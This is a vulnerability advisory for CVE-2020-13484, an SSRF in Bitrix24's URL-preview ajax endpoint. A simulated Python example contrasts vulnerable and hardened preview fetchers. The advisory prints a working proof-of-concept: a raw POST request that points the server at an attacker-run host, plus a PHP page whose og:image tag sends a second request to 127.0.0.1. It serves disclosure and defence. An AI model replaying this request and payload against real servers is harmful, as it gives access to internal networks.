CVE-2020-13484
https://gist.github.com/mariuszpoplawski/26e1fbde8f9a607478bee1de90daa329
------------------------------------------
Bitrix24 through 20.0.975 allows SSRF via an intranet IP address in
the services/main/ajax.php?action=attachUrlPreview url parameter, if
the destination URL hosts an HTML document
containing '<meta name="og:image" content="' followed by an intranet URL.
------------------------------------------
[Additional Information]
The vulnerability allowed us to trigger server-side request forgery to remote
addresses, and a second vulnerability in the same functionality allowed us to
bypass the restrictions and generate a further request that bypassed the
local-IP block policy. We were able to generate requests into the internal
infrastructure.
In the first stage we found an SSRF that only allowed us to send requests to
remote addresses. Then we manipulated the parser into parsing our HTML page
and generating a second request to the internal Bitrix core on the server
side. Bitrix was parsing og:image tags, so we could trigger a second SSRF
this way. The second request was not properly checked for "local" IPs.
To generate the SSRF we need to trigger the following request:
POST /bitrix/services/main/ajax.php?action=attachUrlPreview&show_actions=y&buildd_preview=y&die_step=3&admin_section=Y&show_cache_stat1=Y&clear_cache=Y&c=bitrix:main.urlpreview&mode=ajax&=&sessid=bd277e27ef185f42bebbb1d538e66574&signedParamsString=1.12&listSubscribeId[]=1&itemId=1&deleteSubscribe=Y&userFieldId=0&elementId=1 HTTP/1.1
Host: 192.168.1.24
Origin: http://192.168.1.24
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36
Bx-ajax: true
Accept: */*
Referer: http://192.168.1.24/stream/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: BITRIX_SM_TIME_ZONE=-120; BITRIX_SM_SALE_UID=0; BITRIX_SM_SOUND_LOGIN_PLAYED=Y; PHPSESSID=btu7cck1irm51hsgs45akh5dma; BITRIX_SM_NCC=Y; BITRIX_SM_LOGIN=admin; BITRIX_SM_LAST_SETTINGS=;show_cache_stat=Y
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
url=http://OurVPSHost/index.php?id=1
index.php file on the "OurVPSHost" host (the closing '>' of the meta tag was missing in the original listing):
---------------------------------
<?php header('Content-Type:text/html'); ?>
<meta name="og:image" content="http://127.0.0.1/fake_img.php"/>
---------------------------------
The vulnerability sends a second SSRF: the first request does not allow
sending internal requests, but the HTML parser parses our og:image tag and
sends an internal request by redirecting the Bitrix server to
127.0.0.1/fake_img.php. This way we are able to bypass the restrictions of
the Bitrix core.
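As an added example (not part of the original advisory and not Bitrix's own code), the following Python sketch reproduces the two-hop pattern described above against constructed, offline stand-ins for DNS and HTTP, and contrasts a preview builder that validates only the user-supplied URL with one that applies the same destination policy to every URL it is about to fetch, including the og:image URL that the HTML parser extracts. The host name "ourvpshost.example", its address, the documents in FAKE_WEB, and the function names is_allowed_target, build_preview_vulnerable and build_preview_hardened are all assumptions made for the example, not Bitrix identifiers.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-ins for DNS and HTTP so the example runs offline.
# Assumption: "ourvpshost.example" resolves to a routable address and serves
# a document mirroring the index.php page shown in the advisory.
FAKE_DNS = {
    "ourvpshost.example": "93.184.216.34",
    "localhost": "127.0.0.1",
}
FAKE_WEB = {
    "http://ourvpshost.example/index.php?id=1":
        '<meta name="og:image" content="http://127.0.0.1/fake_img.php"/>',
    "http://127.0.0.1/fake_img.php": "internal-only response",
}


def resolve(host):
    """Resolve a host name or IP literal using the constructed table."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return ipaddress.ip_address(FAKE_DNS[host])  # KeyError for unknown names


def is_allowed_target(url):
    """Destination policy: http(s) only, and the resolved address must be public unicast."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        ip = resolve(parts.hostname.lower())
    except KeyError:
        return False
    return ip.is_global and not ip.is_multicast


class OgImageParser(HTMLParser):
    """Collect the first og:image meta tag, whether written as name= or property=."""

    def __init__(self):
        super().__init__()
        self.og_image = None

    def handle_starttag(self, tag, attrs):
        if tag != "meta" or self.og_image is not None:
            return
        attr = dict(attrs)
        if attr.get("name") == "og:image" or attr.get("property") == "og:image":
            self.og_image = attr.get("content")


def extract_og_image(html):
    parser = OgImageParser()
    parser.feed(html)
    return parser.og_image


def fetch(url, log):
    """Simulated HTTP GET; records every URL that would actually be requested."""
    log.append(url)
    return FAKE_WEB.get(url, "")


def build_preview_vulnerable(url):
    """Checks only the user-supplied URL, then follows og:image unchecked (the flaw in the advisory)."""
    log = []
    if not is_allowed_target(url):
        return {"error": "blocked", "requests": log}
    image = extract_og_image(fetch(url, log))
    if image:
        fetch(image, log)  # second, parser-derived request: never validated
    return {"image": image, "requests": log}


def build_preview_hardened(url):
    """Applies is_allowed_target to every URL before it is fetched, including parser-derived ones."""
    log = []
    if not is_allowed_target(url):
        return {"error": "blocked", "requests": log}
    image = extract_og_image(fetch(url, log))
    if image and not is_allowed_target(image):
        return {"image": None, "error": "og:image blocked", "requests": log}
    if image:
        fetch(image, log)
    return {"image": image, "requests": log}


if __name__ == "__main__":
    start = "http://ourvpshost.example/index.php?id=1"
    print("vulnerable:", build_preview_vulnerable(start)["requests"])
    print("hardened:  ", build_preview_hardened(start))
```

The point of the hardened variant is that the destination check is a property of every outbound fetch, not of the first user-supplied URL. In a real fetcher the same check must also run on each HTTP redirect hop, and the connection should be made to the address that was validated rather than re-resolving the name, so that a DNS answer cannot change between the check and the request.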
------------------------------------------
[VulnerabilityType Other]
Unauthorized server side request forgery, bypass domain whitelist
------------------------------------------
[Vendor of Product]
1c-bitrix.ru, bitrix24.net
------------------------------------------
[Affected Product Code Base]
Bitrix and Bitrix Cloud instances are affected up to security update (main 20.0.975); reported and fixed in the latest patch
------------------------------------------
[Affected Component]
Main core URLPreview function
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[CVE Impact Other]
Force server side request forgery
------------------------------------------
[Attack Vectors]
To exploit the vulnerability the attacker needs access to the website, a
valid unauthenticated session and a CSRF token; all can be generated without
any privileges, no additional requirements needed.
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
Mariusz Poplawski (afine.pl)
------------------------------------------
[Reference]
https://www.bitrix24.com/prices/self-hosted.php
https://www.bitrix24.com/security/
Mariusz Popławski / AFINE.com team